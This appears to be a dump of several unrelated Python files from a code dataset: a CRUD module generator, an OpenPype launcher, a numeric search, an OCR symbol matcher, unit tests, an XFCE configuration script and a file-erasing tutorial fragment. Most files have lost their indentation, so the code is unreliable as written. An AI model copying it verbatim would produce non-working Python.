import_value = "from app.models import model as db\n\n\n"
moduls_path = ""
file_moduls_path = ""
if sync_md is None:
moduls_path = app_path+"/app/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
else:
moduls_path = app_path+"/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
f=open(file_moduls_path, "a+")
f.write(import_value)
function_value = ""
utils.report("Moduls "+moduls_name+" Create")
for i in moduls_data:
if moduls_data[i]['action'] == 'insert':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = args['fields']
try:
result = db.insert(table, fields)
except Exception as e:
respons = {
"status": False,
"error": str(e)
}
else:
respons = {
"status": True,
"messages": "Fine!",
"id": result
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'remove':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
result = db.delete(table,fields,field_value)
except Exception as e:
respons = {
"status": False,
"messages": str(e)
}
else:
respons = {
"status": result,
"messages": "Fine Deleted!"
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'get':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
try:
results = db.get_all(args['table'])
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
elif moduls_data[i]['action'] == 'where':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
results = db.get_by_id(args['table'],fields,field_value)
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
else:
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
return args\n\n
"""
f.write(function_value)
f.close()
def add_function_moduls(moduls_name, moduls_data, app_path, sync_md = None):
moduls_path = ""
file_moduls_path = ""
if sync_md is None:
moduls_path = app_path+"/app/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
else:
moduls_path = app_path+"/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
with open(file_moduls_path, "a") as myfile:
function_value = ""
for i in moduls_data:
# print(i)
if moduls_data[i]['action'] == 'insert':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = args['fields']
try:
result = db.insert(table, fields)
except Exception as e:
respons = {
"status": False,
"error": str(e)
}
else:
respons = {
"status": True,
"messages": "Fine!",
"id": result
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'remove':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
result = db.delete(table,fields,field_value)
except Exception as e:
respons = {
"status": False,
"messages": str(e)
}
else:
respons = {
"status": result,
"messages": "Fine Deleted!"
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'get':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
try:
results = db.get_all(args['table'])
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
elif moduls_data[i]['action'] == 'where':
function_value += """
def """+moduls_data[i]['action']+"""(args):
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
results = db.get_by_id(args['table'],fields,field_value)
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
else:
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
return args\n\n
"""
myfile.write(function_value)
|
nilq/baby-python
|
python
|
import os
import sys
import openpype
from openpype.api import Logger
log = Logger().get_logger(__name__)
def main(env):
from openpype.hosts.fusion.api import menu
    import avalon.api
    import avalon.fusion
# Registers pype's Global pyblish plugins
openpype.install()
# activate resolve from pype
avalon.api.install(avalon.fusion)
log.info(f"Avalon registred hosts: {avalon.api.registered_host()}")
    menu.launch_openpype_menu()
    return True  # report success so the exit-code check below yields 0
if __name__ == "__main__":
result = main(os.environ)
sys.exit(not bool(result))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import math
import numpy as np
VELOCITIES = np.array([
(1, 0),
(np.sqrt(1/2+np.sqrt(1/8)), np.sqrt(1/6-np.sqrt(1/72))),
(np.sqrt(1/2), np.sqrt(1/6)),
(np.sqrt(1/2-np.sqrt(1/8)), np.sqrt(1/6+np.sqrt(1/72))),
(0, np.sqrt(1/3))
])
VELOCITIES.flags.writeable = False
assert np.allclose(np.square(VELOCITIES * [1, np.sqrt(3)]).sum(axis=1), 1)
def distance(velocities):
rounded = velocities.round()
delta = velocities - rounded
squared = np.square(delta)
return math.fsum(squared.flat)
# def distance(velocities):
# rounded = (velocities + 0.5).round() - 0.5
# delta = velocities - rounded
# processed = 1 / (np.square(delta) + 1)
# return processed.sum()
def main():
last_q = 0 / 1000000
last_d = distance(VELOCITIES * last_q)
improving = False
for i in range(1, 6000001):
q = i / 1000000
d = distance(VELOCITIES * q)
if d < last_d:
if not improving:
improving = True
elif d > last_d:
if improving:
improving = False
print("%.6f: %.7g" % (last_q, last_d))
last_q = q
last_d = d
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
import json
import psycopg2
import psycopg2.extras
import re
import transforms
import signal
import sys
from get_pg_conn import get_pg_conn
# see https://filosophy.org/code/python-function-execution-deadlines---in-simple-examples/
class TimedOutExc(Exception):
pass
def deadline(timeout, *args):
def decorate(f):
def handler(signum, frame):
raise TimedOutExc()
        def new_f(*args):
            signal.signal(signal.SIGALRM, handler)
            signal.alarm(timeout)
            try:
                return f(*args)
            finally:
                signal.alarm(0)  # always clear the alarm, even on an exception
new_f.__name__ = f.__name__
return new_f
return decorate
@deadline(5)
def attempt_match(args, matcher_id, transformed_word_ids_by_transformed_word, matches, transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id, figure_id, word, symbol_id, transformed_word):
if transformed_word:
matches.add(transformed_word)
if transformed_word not in transformed_word_ids_by_transformed_word:
# This might not be the best way to insert. TODO: look at the proper way to handle this.
transformed_words_cur.execute(
'''
INSERT INTO transformed_words (transformed_word)
VALUES (%s)
ON CONFLICT (transformed_word) DO UPDATE SET transformed_word = EXCLUDED.transformed_word
RETURNING id;
''',
(transformed_word, )
)
transformed_word_id = transformed_words_cur.fetchone()[0]
transformed_word_ids_by_transformed_word[transformed_word] = transformed_word_id
else:
transformed_word_id = transformed_word_ids_by_transformed_word[transformed_word]
else:
transformed_word_id = None
transform_args = []
for t in args[0:len(transforms_applied)]:
transform_args.append("-" + t["category"][0] + " " + t["name"])
if not word == '':
match_attempts_cur.execute('''
INSERT INTO match_attempts (ocr_processor_id, matcher_id, figure_id, word, transformed_word_id, symbol_id, transforms_applied)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT DO NOTHING;
''',
(ocr_processor_id, matcher_id, figure_id, word, transformed_word_id, symbol_id, " ".join(transform_args))
)
def match(args):
conn = get_pg_conn()
ocr_processors__figures_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
symbols_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
matchers_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
transformed_words_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
match_attempts_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# transforms_to_apply includes both mutations and normalizations
transforms_to_apply = []
for arg in args:
category = arg["category"]
name = arg["name"]
t = getattr(getattr(transforms, name), name)
transforms_to_apply.append({"transform": t, "name": name, "category": category})
transforms_json = []
for t in transforms_to_apply:
transform_json = {}
transform_json["category"] = t["category"]
name = t["name"]
transform_json["name"] = name
with open("./transforms/" + name + ".py", "r") as f:
code = f.read().encode()
transform_json["code_hash"] = hashlib.sha224(code).hexdigest()
transforms_json.append(transform_json)
transforms_json_str = json.dumps(transforms_json)
matchers_cur.execute(
'''
SELECT id FROM matchers WHERE transforms=%s;
''',
(transforms_json_str, )
)
matcher_ids = matchers_cur.fetchone()
if matcher_ids != None:
matcher_id = matcher_ids[0]
else:
matchers_cur.execute(
'''
INSERT INTO matchers (transforms)
VALUES (%s)
ON CONFLICT (transforms) DO UPDATE SET transforms = EXCLUDED.transforms
RETURNING id;
''',
(transforms_json_str, )
)
matcher_id = matchers_cur.fetchone()[0]
if matcher_id == None:
raise Exception("matcher_id not found!");
normalizations = []
for t in transforms_to_apply:
t_category = t["category"]
if t_category == "normalize":
normalizations.append(t)
try:
ocr_processors__figures_query = '''
SELECT ocr_processor_id, figure_id, jsonb_extract_path(result, 'textAnnotations', '0', 'description') AS description
FROM ocr_processors__figures ORDER BY ocr_processor_id, figure_id;
'''
ocr_processors__figures_cur.execute(ocr_processors__figures_query)
symbols_query = '''
SELECT id, symbol
FROM symbols;
'''
symbols_cur.execute(symbols_query)
        # map each symbol, including its normalized variants, to its symbol id
symbol_ids_by_symbol = {}
for s in symbols_cur:
symbol_id = s["id"]
symbol = s["symbol"]
            normalized_results = [symbol]
            for normalization in normalizations:
                # collect into a fresh list: rebinding normalized_results while
                # iterating over it would keep only the last word's results
                next_results = []
                for normalized in normalized_results:
                    for n in normalization["transform"](normalized):
                        next_results.append(n)
                        if n not in symbol_ids_by_symbol:
                            symbol_ids_by_symbol[n] = symbol_id
                        # Also collect unique uppercased symbols for matching
                        if n.upper() not in symbol_ids_by_symbol:
                            symbol_ids_by_symbol[n.upper()] = symbol_id
                normalized_results = next_results
#with open("./symbol_ids_by_symbol.json", "a+") as symbol_ids_by_symbol_file:
# symbol_ids_by_symbol_file.write(json.dumps(symbol_ids_by_symbol))
transformed_word_ids_by_transformed_word = {}
transformed_words_cur.execute(
'''
SELECT id, transformed_word
FROM transformed_words;
'''
)
for row in transformed_words_cur:
transformed_word_id = row["id"]
transformed_word = row["transformed_word"]
transformed_word_ids_by_transformed_word[transformed_word] = transformed_word_id
successes = []
fails = []
for row in ocr_processors__figures_cur:
ocr_processor_id = row["ocr_processor_id"]
figure_id = row["figure_id"]
paragraph = row["description"]
if paragraph:
for line in paragraph.split("\n"):
words = set()
words.add(line.replace(" ", ""))
matches = set()
for w in line.split(" "):
words.add(w)
for word in words:
transforms_applied = []
transformed_words = [word]
for transform_to_apply in transforms_to_apply:
transforms_applied.append(transform_to_apply["name"])
                    # collect surviving candidates into a fresh list: rebinding
                    # transformed_words while iterating over it drops results
                    next_words = []
                    for transformed_word_prev in transformed_words:
for transformed_word in transform_to_apply["transform"](transformed_word_prev):
# perform match for original and uppercased words (see elif)
try:
if transformed_word in symbol_ids_by_symbol:
attempt_match(
args, matcher_id, transformed_word_ids_by_transformed_word, matches,
transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id,
figure_id, word, symbol_ids_by_symbol[transformed_word], transformed_word)
elif transformed_word.upper() in symbol_ids_by_symbol:
attempt_match(
args, matcher_id, transformed_word_ids_by_transformed_word, matches,
transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id,
figure_id, word, symbol_ids_by_symbol[transformed_word.upper()], transformed_word.upper())
else:
                                            next_words.append(transformed_word)
# except TimedOutExc as e:
# print "took too long"
except(Exception) as e:
print('Unexpected Error:', e)
print('figure_id:', figure_id)
print('word:', word)
print('transformed_word:', transformed_word)
print('transforms_applied:', transforms_applied)
raise
                    transformed_words = next_words
                if len(matches) == 0:
attempt_match(args, matcher_id, transformed_word_ids_by_transformed_word, matches, transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id, figure_id, word, None, None)
if len(matches) > 0:
successes.append(line + ' => ' + ' & '.join(matches))
else:
fails.append(line)
conn.commit()
with open("./outputs/successes.txt", "a+") as successesfile:
successesfile.write('\n'.join(successes))
with open("./outputs/fails.txt", "a+") as failsfile:
failsfile.write('\n'.join(fails))
print('match: SUCCESS')
    except psycopg2.DatabaseError as e:
        print('Database Error:', e)
raise
except(Exception) as e:
print('Unexpected Error:', e)
raise
finally:
if conn:
conn.close()
|
nilq/baby-python
|
python
|
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4:
import unittest
from karmia import KarmiaContext
class TestKarmiaContextSet(unittest.TestCase):
def test_parameter(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.parameters[key], value)
def test_object(self):
context = KarmiaContext()
parameter = {'key': 'value'}
context.set(parameter)
self.assertEqual(context.parameters['key'], parameter['key'])
def test_merge(self):
context = KarmiaContext()
parameter1 = {'key1': 'value1'}
parameter2 = {'key2': 'value2'}
context.set(parameter1)
context.set(parameter2)
self.assertEqual(context.parameters['key1'], parameter1['key1'])
self.assertEqual(context.parameters['key2'], parameter2['key2'])
class TestKarmiaContextGet(unittest.TestCase):
def test_parameter(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.get(key), value)
def test_default_parameter(self):
context = KarmiaContext()
key = 'key'
default_value = 'default_value'
self.assertEqual(context.get(key, default_value), default_value)
class TestKarmiaContextRemove(unittest.TestCase):
def test_remove(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.get(key), value)
context.remove(key)
self.assertEqual(context.get(key), None)
class TestKarmiaContextChild(unittest.TestCase):
def test_extend(self):
context = KarmiaContext()
key1 = 'key1'
key2 = 'key2'
values1 = {'value1': 1}
values2 = {'value2': 2}
context.set(key1, values1)
child = context.child()
self.assertEqual(child.get(key1), values1)
child.set(key2, values2)
self.assertEqual(child.get(key1), values1)
self.assertEqual(child.get(key2), values2)
self.assertEqual(context.get(key1), values1)
self.assertEqual(context.get(key2), None)
class TestAnnotate(unittest.TestCase):
def test_annotate_function(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
self.assertEqual(list(context.annotate(fn).keys()), ['value1', 'value2'])
def test_no_arguments(self):
context = KarmiaContext()
fn = lambda: 'result'
self.assertEqual(list(context.annotate(fn).keys()), [])
class TestInvoke(unittest.TestCase):
def test_invoke(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
parameters = {'value1': 1, 'value2': 2}
self.assertEqual(context.invoke(fn, parameters), parameters['value1'] + parameters['value2'])
class TestCall(unittest.TestCase):
def test_return(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
parameters = {'value1': 1, 'value2': 2}
self.assertEqual(context.call(fn, parameters), parameters['value1'] + parameters['value2'])
    def test_callback(self):
        def fn(value1, value2, callback):
            callback(None, value1 + value2)
        def callback(error, result):
            self.assertIsNone(error)
            self.assertEqual(result, parameters['value1'] + parameters['value2'])
        context = KarmiaContext()
        parameters = {'value1': 1, 'value2': 2}
        context.call(fn, parameters, callback)
def test_no_parameters(self):
context = KarmiaContext()
result = 'result'
fn = lambda: result
self.assertEqual(context.call(fn), result)
def test_merge_parameters(self):
context = KarmiaContext()
key = 'value1'
value = 1
parameters = {'value2': 2}
fn = lambda value1, value2: value1 + value2
context.set(key, value)
self.assertEqual(context.call(fn, parameters), value + parameters['value2'])
class TestAsync(unittest.TestCase):
    def test_callback(self):
        def fn(value1, value2, callback):
            return callback(None, value1 + value2)
        def callback(error, result):
            self.assertIsNone(error)
            self.assertEqual(result, parameters['value1'] + parameters['value2'])
        context = KarmiaContext()
        parameters = {'value1': 1, 'value2': 2}
        # 'async' became a reserved word in Python 3.7, so the method has to be
        # fetched with getattr() rather than attribute syntax.
        async_fn = getattr(context, 'async')(fn, parameters)
        self.assertTrue(callable(async_fn))
        async_fn(callback)
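# For reference, a minimal sketch of the context object exercised above,
# reconstructed from the assertions in these tests (an assumption, not the
# actual karmia implementation):
#
#     class MinimalContext(object):
#         def __init__(self, parameters=None):
#             self.parameters = dict(parameters or {})
#
#         def set(self, key, value=None):
#             if isinstance(key, dict):
#                 self.parameters.update(key)  # merge dict parameters
#             else:
#                 self.parameters[key] = value
#
#         def get(self, key, default=None):
#             return self.parameters.get(key, default)
#
#         def remove(self, key):
#             self.parameters.pop(key, None)
#
#         def child(self):
#             # child() copies the parent's parameters; later writes to the
#             # child do not propagate back (see TestKarmiaContextChild).
#             return MinimalContext(self.parameters)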
# Local variables:
# tab-width: 4
# c-basic-offset: 4
# c-hanging-comment-ender-p: nil
# End:
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
# Copyright (c) 2018-2021 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Apply some settings to an XFCE Desktop environment
* Keyboard shortcuts
* Panel configuration
"""
import argparse
import collections
import json
import logging
import re
import os
import os.path
import subprocess
import sys
SHORTCUTS = (
# Use urxvt as Alt+F3 if it is available, otherwise a terminal
('<Alt>F3', ('urxvt', 'xfce4-terminal', 'exo-open --launch TerminalEmulator')),
# Lock screen with Ctrl+Alt+L
('<Primary><Alt>l', ('xflock4', )),
# Take a screenshot with the screenshooter
('Print', ('xfce4-screenshooter', )),
)
logger = logging.getLogger(__name__)
class ActionArguments(object): # pylint: disable=too-few-public-methods
"""Arguments to the program"""
def __init__(self, do_for_real, verbose, home_dir):
self.do_for_real = do_for_real
self.verbose = verbose
self.home_dir = os.path.expanduser(home_dir or '~')
def silent_run(cmd):
"""Run the given command, dropping its output, and return False if it failed"""
logger.debug("running %s", ' '.join(cmd))
try:
subprocess.check_output(cmd)
return True
except subprocess.CalledProcessError as exc:
logger.error("%s", exc)
return False
except OSError as exc:
logger.error("%s", exc)
return False
def try_run(cmd):
"""Try running the command and return its output on success, None on failure"""
logger.debug("running: %s", ' '.join(cmd))
try:
return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
return None
def find_prog_in_path(prog):
"""Find the given program in the default $PATH"""
for path_dir in ('/usr/bin', '/usr/sbin', '/bin', '/sbin'):
path_prog = '{0}/{1}'.format(path_dir, prog)
if os.path.exists(path_prog):
return path_prog
return None
def get_xfce4_shortcut(key):
"""Get the shortcut associated with the given key"""
result = try_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/custom/{0}'.format(key)])
if result is None:
result = try_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/default/{0}'.format(key)])
return result if result is None else result.decode('utf-8').rstrip('\n')
def set_xfce4_shortcut(act_args, key, cmd):
"""Set the shortcut associated with the given key"""
current_cmd = get_xfce4_shortcut(key)
if current_cmd == cmd:
if act_args.verbose:
logger.info("shortcut %s is already %r", key, cmd)
return True
if not act_args.do_for_real:
logger.info("[dry run] shortcut %s: %r -> %r", key, current_cmd, cmd)
return True
logger.info("shortcut %s: %r -> %r", key, current_cmd, cmd)
return silent_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/custom/{0}'.format(key),
'--type', 'string', '--create', '--set', cmd])
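# For illustration, set_xfce4_shortcut(act_args, '<Alt>F3', 'xfce4-terminal')
# boils down to the following command (values taken from SHORTCUTS above):
#   xfconf-query --channel xfce4-keyboard-shortcuts \
#       --property '/commands/custom/<Alt>F3' \
#       --type string --create --set 'xfce4-terminal'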
def set_xfce4_shortcut_avail(act_args, key, progs):
"""Set the shortcut associated with the given key to the first available program"""
for cmdline in progs:
# Split the command line to find the used program
cmd_split = cmdline.split(None, 1)
cmd_split[0] = find_prog_in_path(cmd_split[0])
if cmd_split[0] is not None:
return set_xfce4_shortcut(act_args, key, ' '.join(cmd_split))
logger.warning("no program found for shortcut %s", key)
return True
def configure_xfce4_shortcuts(act_args):
for key, progs in SHORTCUTS:
if not set_xfce4_shortcut_avail(act_args, key, progs):
return False
return True
class Xfce4Panels(object):
"""Represent the state of the panels
c.f. xfconf-query --channel xfce4-panel --list --verbose
"""
# Key => type, default value
panel_properties = (
('autohide-behavior', int, 0),
('length', int, 0),
('plugin-ids', [int], []),
('position', str, ''),
('position-locked', bool, False),
('size', int, 0),
)
# Name, key => type
plugin_properties = (
('clock', 'digital-format', str),
('directorymenu', 'base-directory', str),
('launcher', 'items', [str]),
('separator', 'style', int),
('separator', 'expand', bool),
('systray', 'names-visible', [str]),
)
def __init__(self, act_args):
self.act_args = act_args
self.panels = None
self.panel_plugins = None
self.available_plugins = None
@staticmethod
def read_prop(prop, prop_type, default):
"""Read a property of xfce4-panel channel of the given type"""
is_list = isinstance(prop_type, list) and len(prop_type) == 1 and default in ([], None)
assert is_list or default is None or isinstance(default, prop_type)
result = try_run([
'xfconf-query', '--channel', 'xfce4-panel',
'--property', prop])
if result is None:
return [] if is_list and default is not None else default
lines = result.decode('utf-8').splitlines()
if is_list:
if len(lines) <= 2 or not lines[0].endswith(':') or lines[1] != '':
raise ValueError("unexpected xfce4-panel%s value: %r" % (prop, lines))
return [prop_type[0](line) for line in lines[2:]]
if prop_type is bool and len(lines) == 1:
if lines[0] == 'true':
return True
if lines[0] == 'false':
return False
if prop_type is int and len(lines) == 1:
return int(lines[0])
if prop_type is str and len(lines) == 1:
return lines[0]
raise NotImplementedError("unable to convert result to %r: %r" % (prop_type, lines))
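    # Raw xfconf-query outputs that read_prop() expects (illustrative values;
    # the list format is a header ending with ':', a blank line, then items):
    #   /panels (list of int):        "Value is an array with 2 items:\n\n1\n2"
    #   .../position-locked (bool):   "true"
    #   .../size (int):               "30"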
def set_panel_prop(self, panel_id, prop_name, value):
"""Set a panel property"""
for prop, prop_type, default in self.panel_properties:
if prop == prop_name:
is_list = isinstance(prop_type, list) and len(prop_type) == 1
if is_list:
assert all(isinstance(v, prop_type[0]) for v in value), \
"Wrong value type for panel property %s" % prop_name
else:
assert isinstance(value, prop_type), \
"Wrong value type for panel property %s" % prop_name
# Prepare the arguments for xfconf-query
if is_list:
text_type = 'list'
text_value = str(value) # TODO: how to modify lists?
elif prop_type is bool:
text_type = 'bool'
text_value = 'true' if value else 'false'
                elif prop_type is int:
                    text_type = 'int'
                    text_value = str(value)
                elif prop_type is str:
                    text_type = 'string'
                    text_value = value
else:
raise NotImplementedError("unable to write a property of type %r" % prop_type)
# Get the current value
prop_path = '/panels/panel-{0}/{1}'.format(panel_id, prop_name)
current_val = self.panels[panel_id][prop_name]
if current_val == value:
if self.act_args.verbose:
logger.info("%s is already %r", prop_path, value)
return True
if not self.act_args.do_for_real:
logger.info("[dry run] %s: %r -> %r", prop_path, current_val, value)
return True
logger.info("%s: %r -> %r", prop_path, current_val, value)
result = silent_run([
'xfconf-query', '--channel', 'xfce4-panel',
'--property', prop_path,
'--create', '--type', text_type, '--set', text_value])
if not result:
return result
# Sanity check
new_value = self.read_prop(prop_path, prop_type, default)
if new_value == current_val:
logger.error("failed to set %s to %r (old value stayed)", prop_path, value)
return False
if new_value != value:
logger.error("failed to set %s to %r (new value %r)", prop_path, value, new_value)
return False
return True
raise NotImplementedError("unknown panel property %s" % prop_name)
def read_file(self, file_rel_path):
"""Read a configuration file"""
abs_path = os.path.join(
self.act_args.home_dir, '.config', 'xfce4', 'panel', file_rel_path)
logger.debug("reading %s", abs_path)
try:
with open(abs_path, 'r') as stream:
return stream.read().splitlines()
except OSError:
return None
def read_panels(self):
"""Retrieve the currently configured panels"""
panel_ids = self.read_prop('/panels', [int], [])
if not panel_ids:
logger.error("failed to retrieve xfce4-panel/panels enumeration")
return False
self.panels = collections.OrderedDict()
self.panel_plugins = collections.OrderedDict()
for panel_id in panel_ids:
if panel_id in self.panels:
logger.error("duplicated xfce4-panel/panels ID %d", panel_id)
return False
prop_prefix = '/panels/panel-{0}/'.format(panel_id)
self.panels[panel_id] = {}
for prop, prop_type, default in self.panel_properties:
try:
self.panels[panel_id][prop] = self.read_prop(prop_prefix + prop, prop_type, default)
except ValueError as exc:
logger.error("%s", exc)
return False
self.panel_plugins[panel_id] = collections.OrderedDict()
for plugin_id in self.panels[panel_id]['plugin-ids']:
# Read the plugin config
prop_prefix = '/plugins/plugin-{0}'.format(plugin_id)
plugin_name = self.read_prop(prop_prefix, str, '')
self.panel_plugins[panel_id][plugin_id] = collections.OrderedDict()
self.panel_plugins[panel_id][plugin_id]['name'] = plugin_name
for plname, prop, prop_type in self.plugin_properties:
if plname != plugin_name:
continue
val = self.read_prop(prop_prefix + '/' + prop, prop_type, None)
if val is not None:
self.panel_plugins[panel_id][plugin_id][prop] = val
# Read the files associated with the plugin
if plugin_name == 'launcher':
# Load the .desktop file associated with a launcher
items = self.panel_plugins[panel_id][plugin_id].get('items')
if items:
self.panel_plugins[panel_id][plugin_id]['item-files'] = collections.OrderedDict()
for item_name in items:
content = self.read_file('{0}-{1}/{2}'.format(plugin_name, plugin_id, item_name))
self.panel_plugins[panel_id][plugin_id]['item-files'][item_name] = content
elif plugin_name in ('cpugraph', 'fsguard', 'netload', 'systemload'):
content = self.read_file('{0}-{1}.rc'.format(plugin_name, plugin_id))
if content is not None:
self.panel_plugins[panel_id][plugin_id]['rc-file'] = content
return True
def read_available_plugins(self):
"""Load the available panel plugins"""
plugins_path = '/usr/share/xfce4/panel/plugins'
logger.debug("loading files from %s", plugins_path)
available_plugins = set()
for filename in os.listdir(plugins_path):
if filename.endswith('.desktop'):
with open(os.path.join(plugins_path, filename), 'r') as fplugin:
for line in fplugin:
if re.match(r'^X-XFCE-Module\s*=\s*(\S+)', line):
# The .desktop file is a module. Let's add its name!
available_plugins.add(filename[:-8])
break
self.available_plugins = available_plugins
return True
def read_config(self):
"""Load all configuration options related to the panels"""
if not self.read_panels():
return False
if not self.read_available_plugins():
return False
return True
def dump_config(self, stream):
"""Print the loaded configuration"""
json.dump(
collections.OrderedDict((('panels', self.panels), ('plugins', self.panel_plugins))),
stream, indent=2)
stream.write('\n')
def configure(self):
"""Apply configuration of the panels"""
for panel_id, panel_config in sorted(self.panels.items()):
if panel_config['position'] == 'p=10;x=0;y=0':
# Bottom panel
logger.info("Found bottom panel with ID %d", panel_id)
if not self.set_panel_prop(panel_id, 'position-locked', True):
return False
if not self.set_panel_prop(panel_id, 'length', 0):
return False
# "Automatically hide the panel" -> "Always"
if not self.set_panel_prop(panel_id, 'autohide-behavior', 2):
return False
elif panel_config['position'] == 'p=6;x=0;y=0':
# Top panel
logger.info("Found top panel with ID %d", panel_id)
if not self.set_panel_prop(panel_id, 'position-locked', True):
return False
if not self.set_panel_prop(panel_id, 'length', 100):
return False
if not self.set_panel_prop(panel_id, 'autohide-behavior', 0):
return False
return True
def main(argv=None):
parser = argparse.ArgumentParser(
description="Apply settings to an XFCE Desktop environment")
parser.add_argument('-d', '--debug', action='store_true',
help="show debug messages")
parser.add_argument('-n', '--dry-run',
dest='real', action='store_false', default=False,
help="show what would change with --real (default)")
parser.add_argument('-r', '--real', action='store_true',
help="really change the settings")
parser.add_argument('-v', '--verbose', action='store_true',
help="show the settings which would not be modified")
parser.add_argument('-H', '--home', type=str,
help="$HOME environment variable to use")
parser.add_argument('-P', '--show-panels', action='store_true',
help="show panels configuration")
args = parser.parse_args(argv)
logging.basicConfig(
format='[%(levelname)s] %(message)s',
level=logging.DEBUG if args.debug else logging.INFO)
# Try using xfconf-query --version
if not silent_run(['xfconf-query', '--version']):
logger.fatal("xfconf-query does not work")
return False
act_args = ActionArguments(args.real, args.verbose, args.home)
if not configure_xfce4_shortcuts(act_args):
return False
panels = Xfce4Panels(act_args)
if not panels.read_config():
return False
if args.show_panels:
panels.dump_config(sys.stdout)
if not panels.configure():
return False
return True
if __name__ == '__main__':
sys.exit(0 if main() else 1)
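# Example invocations (script name illustrative; options defined above):
#   ./xfce4_config.py              # dry run: log what would change
#   ./xfce4_config.py -P           # additionally dump the panel config as JSON
#   ./xfce4_config.py --real -v    # actually apply the settings, verbosely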
|
nilq/baby-python
|
python
|
# import argv variable so we can take command line arguments
from sys import argv
# extract the command line arguments from argv and store them in variables
script, filename = argv
# print a formatted string with the filename command line argument inserted
print(f"We're going to erase {filename}")
# print a string
print("If you don't want that, hit CTRL-C (^C)")
# print a string
